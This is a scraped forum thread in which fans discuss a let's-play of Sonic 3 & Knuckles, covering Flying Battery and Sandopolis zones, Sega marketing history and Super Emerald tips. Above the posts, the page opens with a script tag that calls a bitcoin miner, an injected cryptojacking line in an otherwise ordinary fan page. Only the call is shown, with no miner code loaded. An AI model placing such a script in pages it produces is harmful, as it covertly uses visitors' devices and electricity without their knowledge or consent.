<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitysmw central

All The S@nics - ℝ - Can YOU Feel The Sunshine?

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 2258
Joined: 7 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Leet » 3 months ago

it's like a creepypasta where tails is trying to convey a message by killing you and opening pathways
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
BobisOnlyBob
Mythical Quadruped
Posts: 1080
Joined: 6 years ago
Location: the world is no longer a place

Re: All The SOUPER S@nics - 3&K - Invincible

Postby BobisOnlyBob » 3 months ago

BOB is an acronym for BOB is Only BOB etc.

User avatar
Grounder
Posts: 3413
Joined: 5 years ago

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Grounder » 3 months ago

phantasmagoria sun ick racks free or measles



raocow already played sonic 3 for the internet

slipped my mind for a couple of days
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

User avatar
Heavy Sigh
Posts: 615
Joined: 6 years ago

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Heavy Sigh » 3 months ago

Fun Sonic Facts!

Prior to the first official showcase of Sonic & Knuckles, 40 competitions were held all across the world (or at least in Canada, Japan, Brazil and 16 competitions held at Hard Rock Cafes across America), where players would compete on Sonic 3 carts to see who could collect the most rings.

Winners of these competitions would be handcuffed, dressed in prison uniforms and put on a plane to San Francisco to participate in a high-speed chase, being escorted by Brink's trucks and limousines along the way. Five additional winners came from randomly selected calls from a special 800 telephone number. All forty five winners were escorted to Pier 41 in San Francisco and ferried out to a section of Alcatraz locked off from the public for a publicity stunt.

On Monday, October 17th, Sega teamed up with broadcaster MTV to show Sonic&Knuckles on a special television show, 'Rock the Rock'. Taking place on the prison island of Alcatraz ("the rock"), it featured 45 contestants competing for a $25,000 grand prize. All contestants would compete on Mushroom Hill Zone for rings at around 1PM in the afternoon, with only two winners out of the whole lot, Mark Guinane of Boston (274 rings) and Chris Tang of San Francisco (248 rings) selected for a final duel.

The finale had the pair competing as Knuckles in Launch Base Zone, where the 18-year old Tang collected 30 more rings than his rival to take home the money and the title of "World's Most Hard-Core Gamer". Both were also set to receive every Sega product released over the course of the next year, paid for out of Sega of America's $45 million marketing budget for Sonic & Knuckles.

Fun Level Facts!

Flying Battery Zone was originally meant to be in Sonic 3, taking place between Carnival Night Zone and IceCap Zone, as supported by the Zone order found in the Level Select and the Zone's enemies being mentioned in the game's US manual. The cannon at the end of Carnival Night would have launched Sonic and Tails to the flying fortress. At the end, Sonic runs down a hallway and hits a panel off the ship, which would have been used as a snowboard by him at the beginning of IceCap Zone.

kurt91
Posts: 52
Joined: 3 years ago

Re: All The SOUPER S@nics - 3&K - Invincible

Postby kurt91 » 3 months ago

Google gives a definition for "battery" as...

Battery - A fortified emplacement for heavy guns.

Just thought I'd post it for raocow to see, 'cause it looks like he's making the same misunderstanding that I did when I played this as a kid.

User avatar
Cyril
metal nerd
Posts: 2018
Joined: 5 years ago
First name: Cyril
Pronouns: he/she/they
Location: hell

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Cyril » 3 months ago



@ArtDecider
i've honestly never played a video game in my life
:catcrime:

User avatar
Blivsey
forever an obscure pokemons
Posts: 896
Joined: 7 years ago
First name: Liv
Pronouns: she/her
Location: Ioway

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Blivsey » 3 months ago

Fun fact: this is one of the zones where you can reach the capsule fast enough that Robotnik will still be on screen escaping when the score tally starts. His explosions will suddenly turn into garbled numbers because the explosion gfx shares the same slot as the tally font and gets overwritten before he can leave.

Try it at home, kids!
convenient noise thread for stress-relief purposes

strongbadman
Posts: 266
Joined: 8 years ago
Location: USA

Re: All The SOUPER S@nics - 3&K - Invincible

Postby strongbadman » 3 months ago

Heavy Sigh wrote: Fun Sonic Facts!

Prior to the first official showcase of Sonic & Knuckles, 40 competitions were held all across the world (or at least in Canada, Japan, Brazil and 16 competitions held at Hard Rock Cafes across America), where players would compete on Sonic 3 carts to see who could collect the most rings.

Winners of these competitions would be handcuffed, dressed in prison uniforms and put on a plane to San Francisco to participate in a high-speed chase, being escorted by Brink's trucks and limousines along the way. Five additional winners came from randomly selected calls from a special 800 telephone number. All forty five winners were escorted to Pier 41 in San Francisco and ferried out to a section of Alcatraz locked off from the public for a publicity stunt.

On Monday, October 17th, Sega teamed up with broadcaster MTV to show Sonic&Knuckles on a special television show, 'Rock the Rock'. Taking place on the prison island of Alcatraz ("the rock"), it featured 45 contestants competing for a $25,000 grand prize. All contestants would compete on Mushroom Hill Zone for rings at around 1PM in the afternoon, with only two winners out of the whole lot, Mark Guinane of Boston (274 rings) and Chris Tang of San Francisco (248 rings) selected for a final duel.

The finale had the pair competing as Knuckles in Launch Base Zone, where the 18-year old Tang collected 30 more rings than his rival to take home the money and the title of "World's Most Hard-Core Gamer". Both were also set to receive every Sega product released over the course of the next year, paid for out of Sega of America's $45 million marketing budget for Sonic & Knuckles.

Fun Level Facts!

Flying Battery Zone was originally meant to be in Sonic 3, taking place between Carnival Night Zone and IceCap Zone, as supported by the Zone order found in the Level Select and the Zone's enemies being mentioned in the game's US manual. The cannon at the end of Carnival Night would have launched Sonic and Tails to the flying fortress. At the end, Sonic runs down a hallway and hits a panel off the ship, which would have been used as a snowboard by him at the beginning of IceCap Zone.
Fans of Sonic might think the unused ending of Flying Battery sounds familiar.

xnamkcor
Posts: 487
Joined: 9 years ago

Re: All The SOUPER S@nics - 3&K - Invincible

Postby xnamkcor » 3 months ago

kurt91 wrote: Google gives a definition for "battery" as...

Battery - A fortified emplacement for heavy guns.

Just thought I'd post it for raocow to see, 'cause it looks like he's making the same misunderstanding that I did when I played this as a kid.
I'm pretty sure C sized batteries will fit in a shotgun...
You cannot add yourself to the friends list.
Image
You cannot add yourself to the foes list.

User avatar
Le Neveu de Rameau
The Judith Butler of bad puns
Posts: 887
Joined: 4 years ago
First name: Rameau's Nephew
Location: Rubbish bin, hands comically perched on the rim.

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Le Neveu de Rameau » 3 months ago

I'm pretty sure Robotnik being much fitter and more mobile than he looks is a deliberate touch; the games seem to be fairly consistent abut it.

Also, I have to disagree that the extra bells and whistles in the Act 2 version of the Flying Battery theme are an improvement. The the Act 1 version always seemed like pure perfection to me; the extra notes, in contrast, give it a clownish aspect, and rob the otherwise magnificent bridge of a lot of its power. Generally speaking, I usually find myself preferring the cleaner Act 1 songs to the overproduced Act 2 remixes. Sometimes less is indeed more.

User avatar
BobisOnlyBob
Mythical Quadruped
Posts: 1080
Joined: 6 years ago
Location: the world is no longer a place

Re: All The SOUPER S@nics - 3&K - Invincible

Postby BobisOnlyBob » 3 months ago

kurt91 wrote: Google gives a definition for "battery" as...

Battery - A fortified emplacement for heavy guns.

Just thought I'd post it for raocow to see, 'cause it looks like he's making the same misunderstanding that I did when I played this as a kid.
There's actually a single-use hazard in Flying Battery Act 1 on one route, this weird gold block that floats back and forth, which I can't help but think of as the Literal Flying Battery:

Image

Anyway, the Giant Rings in Act 1 are both hidden under Spikes, which you can push from the sides. The ones in Act 2, as raocow suspected, are in hidden walls off to the left; one is in a corkscrew elevator.
BOB is an acronym for BOB is Only BOB etc.

User avatar
Grounder
Posts: 3413
Joined: 5 years ago

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Grounder » 3 months ago

bot and also nik and spinballs
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

User avatar
Kleetus
Posts: 210
Joined: 11 months ago
Location: Under a starless sky (due to light pollution)

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Kleetus » 3 months ago

It's... different how you haven't had to attack theses past few bosses.
I like the look of Sandopolis act 1, I especially like the wooden(?) pillars in the background of the interior parts; sometimes it's the small things.

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 2258
Joined: 7 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Leet » 3 months ago

Getting all the emeralds 2 is looking pretty unlikely :cold_sweat:
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
Grounder
Posts: 3413
Joined: 5 years ago

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Grounder » 3 months ago

Leet wrote: Getting all the emeralds 2 is looking pretty unlikely :cold_sweat:
Thankfully, this won't be an issue IIRC.

You can select zones after clearing the game.
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

User avatar
SAJewers
hi
Posts: 3268
Joined: 7 years ago
Location: Nova Scotia

Re: All The SOUPER S@nics - 3&K - Invincible

Postby SAJewers » 3 months ago

That is correct (at least on S&KC).
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
Mandew
Posts: 441
Joined: 10 years ago
First name: Marc
Pronouns: a person
Location: canada

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Mandew » 3 months ago

Can confirm, on the Genesis Version it's possible to just select Mushroom Hill Zone after clearing the game and thusly just have like, infinite attempts at Super Emeralds.
video games

User avatar
Cyril
metal nerd
Posts: 2018
Joined: 5 years ago
First name: Cyril
Pronouns: he/she/they
Location: hell

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Cyril » 3 months ago

yeah that's how i always got the super emeralds myself lol

rao will need to replay the final regular zone again tho
i've honestly never played a video game in my life
:catcrime:

User avatar
Heavy Sigh
Posts: 615
Joined: 6 years ago

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Heavy Sigh » 3 months ago

Fun Sonic Facts!

Once the two parts of Sonic 3 were finally out, much of the Japanese staff at STI decided to return to Japan, including Yuji Naka. Yasuhara, however, elected to remain in the United States despite promises of a higher salary. Though the exact reasons as to why were never made public, rumors at the time insinuated that the legendary partnership between the two minds of Sonic had fallen apart because Yasuhara refused to continue dealing with Naka's incredibly abrasive attitude and the talent it had driven away in droves.

But while the reasons for the breakup can never really be substantiated, the fact remains that Sonic & Knuckles was the end of an era. Though Yasuhara had some input in Sonic 3D, Sonic R, and the cursed production of Sonic X-treme, Knuckles was the last time the man who had shepherded the series would touch it in any real capacity.

The Sonic Team name would live on without him, however, as Yuji Naka would reunite with Sonic creator Naoto Ohshima back in Japan, and the pair would spearhead classic Sega Saturn titles as NiGHTS into Dreams and Burning Rangers, until SEGA came up with another brilliant plan for the creation of Sonic Adventure.

Fun Level Facts!

The ghosts (Hyudoro) appearing in Sandopolis Act Two are the first enemies in the series to have no connection to Eggman. In fact, Eggman was forced to expend a great deal of effort trapping the ghosts just to gain control of the pyramid and the passage to Lava Reef Zone it guarded.

User avatar
Matt is me
[color=#FFD700]Forum codes don't work here...[/color]
Posts: 120
Joined: 9 years ago

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Matt is me » 3 months ago

"Follow the path. Do not deviate from this pathway", raocow says, just before he turns left and deviates from that pathway. :lol:

kurt91
Posts: 52
Joined: 3 years ago

Re: All The SOUPER S@nics - 3&K - Invincible

Postby kurt91 » 3 months ago

Sandopolis is probably my least favorite Zone of the second half of the game. Fortunately, everything from Lava Reef onwards is pretty awesome. Lava Reef for the music, and then the next two Zones together do a pretty good job at storytelling without any dialogue.

User avatar
Kleetus
Posts: 210
Joined: 11 months ago
Location: Under a starless sky (due to light pollution)

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Kleetus » 3 months ago

Turns out chickens were introduced to Egypt around 1500-1400BCE by the military exploits of Pharaoh Thutmose III. They're originally from India, and spread to Asia Minor, which is where the Egyptian picked them up.
Doing a brief search, doesn't look like there are rabbits in Egypt; distribution maps of Leporidae show them all throughout Africa except the desert parts. The closest relative to rabbits in Egypt are pikas.
Cacti are not an animal found in Egypt, euphorbia beat them to the "screw hydration, pointy plant" ecological niche there. If Cactaceae wish to claim Egypt they must chose a champion from each species to do battle with champions from Euphorbiaceae. This is how plants work, my roommate is a biologist.

User avatar
Paragraph
Posts: 600
Joined: 10 years ago

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Paragraph » 3 months ago

kurt91 wrote: Sandopolis is probably my least favorite Zone of the second half of the game. Fortunately, everything from Lava Reef onwards is pretty awesome. Lava Reef for the music, and then the next two Zones together do a pretty good job at storytelling without any dialogue.
I actually really like Sandopolis, but then again I'm the weirdo who loves Marble Zone. Just more of a pure platforming guy, I guess.

User avatar
Mandew
Posts: 441
Joined: 10 years ago
First name: Marc
Pronouns: a person
Location: canada

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Mandew » 3 months ago

fun thing about the Act 2 Boss: If you *do* die of time out, your time resets to zero, right? Well, if you do that, and beat the boss reallyreallyreallyreallyreallyreallyreallyreally fast, you get a Time Bonus so big that it takes an eternity to count down.
video games

Count Mohawk
Posts: 119
Joined: 4 years ago

Re: All The SOUPER S@nics - 3&K - Invincible

Postby Count Mohawk » 3 months ago

Mandew wrote: fun thing about the Act 2 Boss: If you *do* die of time out, your time resets to zero, right? Well, if you do that, and beat the boss reallyreallyreallyreallyreallyreallyreallyreally fast, you get a Time Bonus so big that it takes an eternity to count down.
As I recall, time bonus for 59 seconds or less Act clear is 50,000 points (which will also give you an extra life).
However, clearing a stage at 9:59 exactly is worth 100,000 points (two lives!). Getting that bonus is particularly difficult because you have to know in advance how much time the boss takes to finish exploding after landing the final hit.


Return to “let's play”

Who is online

Users browsing this forum: No registered users and 9 guests